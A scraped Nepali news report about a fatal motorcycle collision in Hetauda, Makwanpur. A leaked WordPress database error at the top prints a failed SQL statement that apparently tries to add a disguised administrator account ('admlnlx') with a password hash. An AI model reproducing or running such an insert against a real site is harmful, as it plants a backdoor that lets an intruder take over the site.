WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNLUETE2hAW01ogr8PysNOJE4SjGuj/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 04:16:08', '', 'admlnlx', 'admlnlx')
बाग्मति । मकवानपुरको हेटौडा उपमहानगरपालिका–१० भुटनदेवी मोडमा दुई मोटरसाइकल एकापसमा ठोक्ँिकदा १७ वर्षीय सगुन रुम्वाको मृत्यु भएको छ । हेटौडा उपमहानगरपालिका–१० का निवासी उहाँको आज उपचारका क्रममा चितवनमा मृत्यु भएको जिल्ला प्रहरी कार्यालय मकवानपुरले जनाएको छ ।
साथै सोही दुर्घटनामा तीनजना घाइते भएको र उनीहरुको हेटौँडामा उपचार भइरहेको प्रहरी कार्यालयका प्रवक्ता जयश्वर रिमालले जानकारी दिए । गएराति हेटौँडाको बुद्धचोकबाट कर्रातर्फ जाँदै गरेको ना४९प ६२२३ नंको मोटरसाइकल र विपरीत दिशाबाट आउँदै गरेको ना४१प ६४३६ नंको मोटरसाइकल भुटनदेवी मोडमा एकापसमा ठोक्ँिकदा सो दुर्घटना भएको बताएको छ । जिल्ला प्रहरी कार्यालयका अनुसार दुर्घटनामा घाइते भएकाहरु हेटौँडाका विज्ञान रुम्वा, विजय लामा र विक्रम लामा रहेको बताएको छ । उपचारपछि रुम्वालाई प्रहरीले नियन्त्रणमा राखेको छ । रासस